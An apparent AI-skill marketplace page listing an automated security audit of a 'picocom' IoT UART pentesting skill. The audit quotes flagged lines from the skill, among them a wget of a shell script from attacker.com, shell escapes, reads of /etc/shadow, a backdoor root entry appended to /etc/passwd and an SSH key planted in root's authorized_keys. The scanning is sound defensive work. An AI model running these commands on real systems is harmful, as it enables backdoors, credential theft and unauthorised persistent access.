picocom

Enables interaction with IoT device UART consoles for pentesting, including device enumeration and vulnerability discovery.

Install this skill

0/100

Security score

The picocom skill was audited on Mar 1, 2026 and we found 25 security issues across 4 threat categories, including 6 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

medium line 679

Template literal with variable interpolation in command context

SourceSKILL.md

679

```bash

medium line 813

Template literal with variable interpolation in command context

SourceSKILL.md

813

```bash

medium line 831

System command execution

SourceSKILL.md

831	awk 'BEGIN {system("/bin/sh")}'

medium line 130

Curl to non-GitHub URL

SourceSKILL.md

130	--trigger-script "curl http://192.168.1.100/api/reboot" \

medium line 364

Curl to non-GitHub URL

SourceSKILL.md

364	--trigger-script "curl -X POST http://192.168.1.100/api/update" \

medium line 393

Curl to non-GitHub URL

SourceSKILL.md

393	--trigger-script "curl http://192.168.1.100/api/reboot" \

medium line 531

Wget to non-GitHub URL

SourceSKILL.md

531	wget http://attacker.com/shell.sh

high line 622

Access to /etc/passwd

SourceSKILL.md

622	cat /etc/passwd

high line 752

Access to /etc/passwd

SourceSKILL.md

752	echo "backdoor:x:0:0::/root:/bin/sh" >> /etc/passwd

high line 829

Access to /etc/passwd

SourceSKILL.md

829	less /etc/passwd # Then !/bin/sh

high line 623

Access to /etc/shadow

SourceSKILL.md

623	cat /etc/shadow # If readable - major security issue!

medium line 739

Access to root home directory

SourceSKILL.md

739	mkdir -p /root/.ssh

medium line 740

Access to root home directory

SourceSKILL.md

740	echo "your_ssh_public_key" >> /root/.ssh/authorized_keys

medium line 741

Access to root home directory

SourceSKILL.md

741	chmod 600 /root/.ssh/authorized_keys

medium line 742

Access to root home directory

SourceSKILL.md

742	chmod 700 /root/.ssh

high line 740

Access to SSH directory

SourceSKILL.md

740	echo "your_ssh_public_key" >> /root/.ssh/authorized_keys

high line 741

Access to SSH directory

SourceSKILL.md

741	chmod 600 /root/.ssh/authorized_keys

low line 130

External URL reference

SourceSKILL.md

130	--trigger-script "curl http://192.168.1.100/api/reboot" \

low line 364

External URL reference

SourceSKILL.md

364	--trigger-script "curl -X POST http://192.168.1.100/api/update" \

low line 393

External URL reference

SourceSKILL.md

393	--trigger-script "curl http://192.168.1.100/api/reboot" \

low line 531

External URL reference

SourceSKILL.md

531	wget http://attacker.com/shell.sh

low line 540

External URL reference

SourceSKILL.md

540	- [BusyBox Official Site](https://busybox.net/)

low line 541

External URL reference

SourceSKILL.md

541	- [BusyBox Command List](https://busybox.net/downloads/BusyBox.html)

low line 542

External URL reference

SourceSKILL.md

542	- [BusyBox Source Code](https://git.busybox.net/busybox/)

low line 896

External URL reference

SourceSKILL.md

896	- [U-Boot documentation](https://u-boot.readthedocs.io/)

Scanned on Mar 1, 2026

View Security Dashboard

Install this skill with one command

/learn @aiskillstore/picocom

GitHub Stars 201

Rate this skill

Categorydevelopment

UpdatedMarch 29, 2026

openclaw backend embedded-developer security-engineer qa-engineer development

aiskillstore/marketplace